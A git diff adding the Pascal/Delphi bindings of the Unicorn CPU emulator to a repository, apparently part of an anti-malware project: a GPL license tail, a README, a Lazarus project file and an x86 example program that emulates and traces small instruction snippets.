THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) 2018 Coldzer0 + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + {signature of Ty Coon}, 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/README.md b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/README.md new file mode 100644 index 0000000..8096d0f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/README.md @@ -0,0 +1,52 @@ +# unicorn-engine-pascal + +Pascal/Delphi language binding for the [Unicorn emulator](http://www.unicorn-engine.org/) +([GitHub](https://github.com/unicorn-engine/unicorn)). + +*Unicorn* is a lightweight multi-platform, multi-architecture CPU emulator framework +based on [QEMU](http://www.qemu.org/). + +## License + +`GPLv2` + +## Compilers Compatibility + +#### Free Pascal >= v3 + - `Mac OS` + - `Windows` + - `Linux` +#### Delphi + - `Windows` +## Features + +* Same API as the C core + - with some workarounds for Pascals case insensitivity: + + + `uc_mem_write()` -> `uc_mem_write_()`, `uc_mem_read()` -> `uc_mem_read_()` + - and the missing feature passing variable number of arguments to functions (`...`): + + i solve it by using -> `args : Array of Const;` + you can pass args inside [] like : + ```pascal + uc_hook_add(uc, trace, UC_HOOK_INSN, @HookIn, nil, 1,0,[UC_X86_INS_IN]; + ``` + the main loader in `Unicorn_dyn.pas` , check X86 example for more info . + + +* Multiplatform (Mac OS , Windows and Linux are tested) + +## Examples +* `X86` Emulate 16, 32, 64 Bit x86 + + +## Version History +* `1.1` + * Add Delphi Compatibility [ Windows ] +* `1.0` + * this is the first version it has all APIs of UNICORN v1.0.1 + +## TODO + - Add more Examples + - Add Mac , Linux Support for Delphi \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lpi b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lpi new file mode 100644 index 0000000..289ab23 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lpi @@ -0,0 +1,105 @@ + + + + + + + + + + + + + + <UseAppBundle Value="False"/> + <ResourceType Value="res"/> + </General> + <BuildModes Count="3"> + <Item1 Name="Default" Default="True"/> + <Item2 Name="Debug"> + <CompilerOptions> + <Version Value="11"/> + <Target> + <Filename Value="x86"/> + </Target> + <SearchPaths> + <IncludeFiles Value="$(ProjOutDir)"/> + <OtherUnitFiles Value="../unicorn"/> + <UnitOutputDirectory Value="lib/$(TargetCPU)-$(TargetOS)"/> + </SearchPaths> + <Linking> + <Debugging> + <UseHeaptrc Value="True"/> + <TrashVariables Value="True"/> + <UseExternalDbgSyms Value="True"/> + </Debugging> + </Linking> + </CompilerOptions> + </Item2> + <Item3 Name="Release"> + <CompilerOptions> + <Version Value="11"/> + <Target> + <Filename Value="x86"/> + </Target> + <SearchPaths> + <IncludeFiles Value="$(ProjOutDir)"/> + <OtherUnitFiles Value="../unicorn"/> + <UnitOutputDirectory Value="lib/$(TargetCPU)-$(TargetOS)"/> + </SearchPaths> + <CodeGeneration> + <SmartLinkUnit Value="True"/> + <Optimizations> + <OptimizationLevel Value="3"/> + </Optimizations> + </CodeGeneration> + <Linking> + <Debugging> + <GenerateDebugInfo Value="False"/> + </Debugging> + <LinkSmart Value="True"/> + </Linking> + </CompilerOptions> + </Item3> + </BuildModes> + <PublishOptions> + <Version Value="2"/> + </PublishOptions> + <RunParams> + <local> + <FormatVersion Value="1"/> + <CommandLineParams Value="-32"/> + </local> + </RunParams> + <Units Count="1"> + <Unit0> + <Filename Value="x86.lpr"/> + <IsPartOfProject Value="True"/> + </Unit0> + </Units> + </ProjectOptions> + <CompilerOptions> + <Version Value="11"/> + <Target> + <Filename Value="x86"/> + </Target> + <SearchPaths> + <IncludeFiles Value="$(ProjOutDir)"/> + <OtherUnitFiles Value="../unicorn"/> + <UnitOutputDirectory Value="lib/$(TargetCPU)-$(TargetOS)"/> + </SearchPaths> + </CompilerOptions> + <Debugging> + <Exceptions Count="3"> + <Item1> + <Name Value="EAbort"/> + </Item1> + <Item2> + <Name Value="ECodetoolError"/> + </Item2> + <Item3> + <Name Value="EFOpenError"/> + </Item3> + </Exceptions> + </Debugging> +</CONFIG> diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lpr b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lpr new file mode 100644 index 0000000..6a24f68 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/pascal/examples/x86.lpr @@ -0,0 +1,1001 @@ +{ + FreePascal/Delphi bindings for the UnicornEngine Emulator Engine . + + Copyright(c) 2018 Coldzer0 . + + License : GPLv2 . +} + +program x86; + +{$IFDEF FPC} + {$MODE Delphi} +{$ENDIF} + +{$ifdef MSWINDOWS} + {$apptype CONSOLE} +{$endif} + +uses + SysUtils, + Unicorn_dyn, + UnicornConst, + X86Const; + +const + // code to be emulated . + X86_CODE32: array[0..6] of Byte = ($41, $4a,$66,$0f,$ef,$c1, $00); // INC ecx; DEC edx ; PXOR xmm0, xmm1 ; + X86_CODE32_JUMP: array[0..8] of Byte = ($eb, $02, $90, $90, $90, $90, $90, $90, $00); // jmp 4; nop; nop; nop; nop; nop; nop ; + X86_CODE32_LOOP: array[0..4] of Byte = ($41, $4a, $eb, $fe, $00); // INC ecx; DEC edx; JMP self-loop + X86_CODE32_MEM_WRITE: array[0..8] of Byte = ($89, $0d, $aa, $aa, $aa, $aa, $41, $4a, $00); // mov [0xaaaaaaaa], ecx; INC ecx; DEC edx ; + X86_CODE32_MEM_READ: array[0..8] of Byte = ($8b, $0d, $aa, $aa, $aa, $aa, $41, $4a, $00); // mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx ; + + X86_CODE32_JMP_INVALID: array[0..6] of Byte = ($e9, $e9, $ee, $ee, $41, $4a, $00); // JMP outside; INC ecx; DEC edx ; + X86_CODE32_INOUT: array[0..7] of Byte = ($41, $E4, $3F, $4a, $E6, $46, $43, $00); // INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx ; + X86_CODE32_INC : array[0..1] of byte = ($40,$00); // INC eax . + + X86_CODE64: array[0..75] of Byte = ( + $41, $BC, $3B, $B0, $28, $2A, $49, $0F, $C9, $90, $4D, $0F, $AD, $CF, $49, $87, $FD, $90, $48, $81, + $D2, $8A, $CE, $77, $35, $48, $F7, $D9, $4D, $29, $F4, $49, $81, $C9, $F6, $8A, $C6, $53, $4D, $87, + $ED, $48, $0F, $AD, $D2, $49, $F7, $D4, $48, $F7, $E1, $4D, $19, $C5, $4D, $89, $C5, $48, $F7, $D6, + $41, $B8, $4F, $8D, $6B, $59, $4D, $87, $D0, $68, $6A, $1E, $09, $3C, $59, $00); + X86_CODE16: array[0..2] of Byte = ($00, $00, $00); // add byte ptr [bx + si], al + X86_CODE64_SYSCALL: array[0..2] of Byte = ($0f, $05, $00); // SYSCALL + + // memory address where emulation starts + ADDRESS = $1000000; + +// callback for tracing basic blocks +procedure HookBlock(uc: uc_engine; address: UInt64; size: Cardinal; user_data: Pointer); cdecl; +begin + WriteLn(Format('>>> Tracing basic block at 0x%x, block size = 0x%x', [address, size])); +end; + +// callback for tracing instruction +procedure HookCode(uc: uc_engine; address: UInt64; size: Cardinal; user_data: Pointer); cdecl; +var + eflags: integer; +begin + WriteLn(Format('>>> Tracing instruction at 0x%x, instruction size = 0x%x', [address, size])); + uc_reg_read(uc, UC_X86_REG_EFLAGS, @eflags); + WriteLn(Format('>>> --- EFLAGS is 0x%x', [eflags])); +end; + +// callback for tracing instruction +procedure HookCode64(uc: uc_engine; address: UInt64; size: Cardinal; user_data: Pointer); cdecl; +var + rip: UInt64; +begin + WriteLn(Format('>>> Tracing instruction at 0x%x, instruction size = 0x%x', [address, size])); + uc_reg_read(uc, UC_X86_REG_RIP, @rip); + WriteLn(Format('>>> --- RIP is 0x%x', [rip])); +end; + +function HookMemInvalid(uc: uc_engine; _type: uc_mem_type; address: UInt64; size: Cardinal; value: Int64; user_data: Pointer): LongBool; cdecl; +begin + case _type of + UC_MEM_WRITE_UNMAPPED: + begin + WriteLn(Format('>>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x', [address, size, value])); + // map this memory in with 2MB in size + uc_mem_map(uc, $aaaa0000, 2 * 1024*1024, UC_PROT_ALL); + // return true to indicate we want to continue + Result := true; + end + else + begin + // return false to indicate we want to stop emulation + Result := false; + end; + end; +end; + +procedure HookMem64(uc: uc_engine; _type: uc_mem_type; address: UInt64; size: Cardinal; value: Int64; user_data: Pointer); cdecl; +begin + case _type of + UC_MEM_READ: + begin + WriteLn(Format('>>> Memory is being READ at 0x%x, data size = %u', [address, size])); + end; + UC_MEM_WRITE: + begin + WriteLn(Format('>>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x', [address, size, value])); + end; + end; +end; + +// callback for IN instruction (X86). +// this returns the data read from the port +function HookIn(uc: uc_engine; port: UInt32; size: integer; user_data: Pointer): Uint32; cdecl; +var + eip: UInt32; +begin + uc_reg_read(uc, UC_X86_REG_EIP, @eip); + WriteLn(Format('--- reading from port 0x%x, size: %u, address: 0x%x', [port, size, eip])); + case size of + 1: + begin + // read 1 byte to AL + Result := $f1; + end; + 2: + begin + // read 2 byte to AX + Result := $f2; + end; + 4: + begin + // read 4 byte to EAX + Result := $f4; + end; + else + begin + // should never reach this + Result := 0; + end; + end; +end; + +// callback for OUT instruction (X86). +procedure HookOut(uc: uc_engine; port: UInt32; size: integer; value: UInt32; user_data: Pointer); cdecl; +var + tmp, eip: UInt32; +begin + uc_reg_read(uc, UC_X86_REG_EIP, @eip); + WriteLn(Format('--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x', [port, size, value, eip])); + + // confirm that value is indeed the value of AL/AX/EAX + case size of + 1: + begin + uc_reg_read(uc, UC_X86_REG_AL, @tmp); + end; + 2: + begin + uc_reg_read(uc, UC_X86_REG_AX, @tmp); + end; + 4: + begin + uc_reg_read(uc, UC_X86_REG_EAX, @tmp); + end; + else + begin + // should never reach this + Exit; + end; + end; + WriteLn(Format('--- register value = 0x%x', [tmp])); +end; + +// callback for SYSCALL instruction (X86). +procedure HookSyscall(uc: uc_engine; user_data: Pointer); cdecl; +var + rax: UInt64; +begin + uc_reg_read(uc, UC_X86_REG_RAX, @rax); + if (rax = $100) then begin + rax := $200; + uc_reg_write(uc, UC_X86_REG_RAX, @rax); + end else + WriteLn(Format('ERROR: was not expecting rax=0x%x in syscall', [rax])); +end; + +procedure TestI386; +var + uc: uc_engine; + err: uc_err; + tmp: UInt32; + trace1, trace2: uc_hook; + r_ecx, r_edx: integer; + r_xmm0,r_xmm1 : array [0..1] of UInt64; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + r_xmm0[0] := $08090a0b0c0d0e0f; r_xmm0[1] := $0001020304050607; + r_xmm1[0] := {%H-}$8090a0b0c0d0e0f0; r_xmm1[1] := $0010203040506070; + + + WriteLn('Emulate i386 code'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32, SizeOf(X86_CODE32) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + uc_reg_write(uc, UC_X86_REG_XMM0, @r_xmm0); + uc_reg_write(uc, UC_X86_REG_XMM1, @r_xmm1); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); + + // emulate machine code in infinite time + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + uc_reg_read(uc, UC_X86_REG_XMM0, @r_xmm0); + + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + WriteLn(Format('>>> XMM0 = 0x%s%s', [IntToHex(r_xmm0[1],16),IntToHex(r_xmm0[0],16)])); + + // read from memory + err := uc_mem_read_(uc, ADDRESS, @tmp, SizeOf(tmp)); + if (err = UC_ERR_OK) then begin + WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [ADDRESS, tmp])); + end else begin + WriteLn(Format('>>> Failed to read 4 bytes from [0x%x], err = %u: %s', [ADDRESS, err, uc_strerror(err)])); + end; + + uc_close(uc); +end; + +procedure test_i386_map_ptr(); +var + uc: uc_engine; + err: uc_err; + tmp: UInt32; + trace1, trace2: uc_hook; + mem : Pointer; + r_ecx, r_edx: integer; + r_xmm0,r_xmm1 : array [0..1] of UInt64; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + r_xmm0[0] := $08090a0b0c0d0e0f; r_xmm0[1] := $0001020304050607; + r_xmm1[0] := {%H-}$8090a0b0c0d0e0f0; r_xmm1[1] := $0010203040506070; + + + WriteLn('==================================='); + WriteLn('Emulate i386 code - use uc_mem_map_ptr()'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + mem := AllocMem(2 * 1024 * 1024); + if mem = nil then + begin + Writeln('Failed to Allocmem'); + uc_close(uc); + exit; + end; + + err := uc_mem_map_ptr(uc,ADDRESS,2 * 1024 * 1024,UC_PROT_ALL,mem); + if err <> UC_ERR_OK then + begin + WriteLn(Format('Failed on uc_mem_map_ptr() with error returned: %u - %s', [err,uc_strerror(err)])); + FreeMem(mem,2 * 1024 * 1024); + uc_close(uc); + Exit; + end; + + Move(X86_CODE32,mem^,SizeOf(X86_CODE32)-1); + if CompareMem(mem,@X86_CODE32,SizeOf(X86_CODE32)-1) <> true then + begin + Writeln('Failed to write emulation code to memory, quit!'); + Freemem(mem,2 * 1024 * 1024); + uc_close(uc); + exit; + end; + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + uc_reg_write(uc, UC_X86_REG_XMM0, @r_xmm0); + uc_reg_write(uc, UC_X86_REG_XMM1, @r_xmm1); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end . + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); + + // emulate machine code in infinite time + err := uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); + if err <> UC_ERR_OK then + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + + Writeln('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + uc_reg_read(uc, UC_X86_REG_XMM0, @r_xmm0); + + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + WriteLn(Format('>>> XMM0 = 0x%s%s', [IntToHex(r_xmm0[1],16),IntToHex(r_xmm0[0],16)])); + + // read from memory + err := uc_mem_read_(uc, ADDRESS, @tmp, SizeOf(tmp)); + if (err = UC_ERR_OK) then begin + WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [ADDRESS, tmp])); + end else begin + WriteLn(Format('>>> Failed to read 4 bytes from [0x%x], err = %u: %s', [ADDRESS, err, uc_strerror(err)])); + end; + + Freemem(mem,2 * 1024 * 1024); + uc_close(uc); +end; + +procedure TestI386Jump; +var + uc: uc_engine; + err: uc_err; + trace1, trace2: uc_hook; +begin + WriteLn('==================================='); + WriteLn('Emulate i386 code with jump'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_JUMP, SizeOf(X86_CODE32_JUMP) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // tracing 1 basic block with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, ADDRESS, ADDRESS,[]); + + // tracing 1 instruction at ADDRESS + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, ADDRESS, ADDRESS,[]); + + // emulate machine code in infinite time + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_JUMP) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + WriteLn('>>> Emulation done.'); + uc_close(uc); +end; + +procedure TestI386Loop; +var + uc: uc_engine; + err: uc_err; + r_ecx, r_edx: integer; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + WriteLn('==================================='); + WriteLn('Emulate i386 code that loop forever'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_LOOP, SizeOf(X86_CODE32_LOOP) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + + // emulate machine code in 2 seconds, so we can quit even + // if the code loops + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_LOOP) - 1, 2 * UC_SECOND_SCALE, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + + uc_close(uc); +end; + +procedure TestI386InvalidMemRead; +var + uc: uc_engine; + err: uc_err; + trace1, trace2: uc_hook; + r_ecx, r_edx: integer; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + WriteLn('==================================='); + WriteLn('Emulate i386 code that read from invalid memory'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_MEM_READ, SizeOf(X86_CODE32_MEM_READ) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + uc_close(uc); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); + + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_MEM_READ) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + + uc_close(uc); +end; + +procedure TestI386InvalidMemWrite; +var + uc: uc_engine; + err: uc_err; + trace1, trace2, trace3: uc_hook; + r_ecx, r_edx: integer; + tmp: UInt32; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + WriteLn('==================================='); + WriteLn('Emulate i386 code that write to invalid memory'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_MEM_WRITE, SizeOf(X86_CODE32_MEM_WRITE) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); + + // intercept invalid memory events + uc_hook_add(uc, trace3, UC_HOOK_MEM_READ_UNMAPPED or UC_HOOK_MEM_WRITE_UNMAPPED, @HookMemInvalid, nil,1,0,[]); + + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_MEM_WRITE) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + + // read from memory + err := uc_mem_read_(uc, $aaaaaaaa, @tmp, SizeOf(tmp)); + if (err = UC_ERR_OK) then + WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [$aaaaaaaa, tmp])) + else + WriteLn(Format('>>> Failed to read 4 bytes from [0x%x]', [$aaaaaaaa])); + + err := uc_mem_read_(uc, $ffffffaa, @tmp, SizeOf(tmp)); + if (err = UC_ERR_OK) then + WriteLn(Format('>>> Read 4 bytes from [0x%x] = 0x%x', [$ffffffaa, tmp])) + else + WriteLn(Format('>>> Failed to read 4 bytes from [0x%x]', [$ffffffaa])); + + uc_close(uc); +end; + +procedure TestI386JumpInvalid; +var + uc: uc_engine; + err: uc_err; + trace1, trace2: uc_hook; + r_ecx, r_edx: integer; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + WriteLn('==================================='); + WriteLn('Emulate i386 code that jumps to invalid memory'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_JMP_INVALID, SizeOf(X86_CODE32_JMP_INVALID) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + uc_close(uc); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); + + err := uc_emu_start(uc, ADDRESS, ADDRESS + SizeOf(X86_CODE32_JMP_INVALID) - 1, 0, 0); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); + end; + + // now print out some registers + WriteLn('>>> Emulation done. Below is the CPU context'); + + uc_reg_read(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_read(uc, UC_X86_REG_EDX, @r_edx); + WriteLn(Format('>>> ECX = 0x%x', [r_ecx])); + WriteLn(Format('>>> EDX = 0x%x', [r_edx])); + + uc_close(uc); +end; + +procedure TestI386Inout; +var + uc: uc_engine; + err: uc_err; + trace1, trace2, trace3, trace4: uc_hook; + r_ecx, r_edx: integer; +begin + r_ecx := $1234; // ECX register + r_edx := $7890; // EDX register + WriteLn('==================================='); + WriteLn('Emulate i386 code with IN/OUT instructions'); + + // Initialize emulator in X86-32bit mode + err := uc_open(UC_ARCH_X86, UC_MODE_32, uc); + if (err <> UC_ERR_OK) then begin + WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); + Exit; + end; + + // map 2MB memory for this emulation + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write_(uc, ADDRESS, @X86_CODE32_INOUT, SizeOf(X86_CODE32_INOUT) - 1) <> UC_ERR_OK) then begin + WriteLn('Failed to write emulation code to memory, quit!'); + Exit; + end; + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_ECX, @r_ecx); + uc_reg_write(uc, UC_X86_REG_EDX, @r_edx); + + // tracing all basic blocks with customized callback + uc_hook_add(uc, trace1, UC_HOOK_BLOCK, @HookBlock, nil, 1, 0,[]); + + // tracing all instruction by having @begin > @end + uc_hook_add(uc, trace2, UC_HOOK_CODE, @HookCode, nil, 1, 0,[]); + + // uc IN instruction + uc_hook_add(uc, trace3, UC_HOOK_INSN, @HookIn, nil, 1,0,[UC_X86_INS_IN]); + // uc OUT instruction + uc_hook_add(uc, trace4, UC_HOOK_INSN, @HookOut, nil, 1,0,[UC_X86_INS_OUT]); + + err := uc_emu_start(uc, ADDRESS, 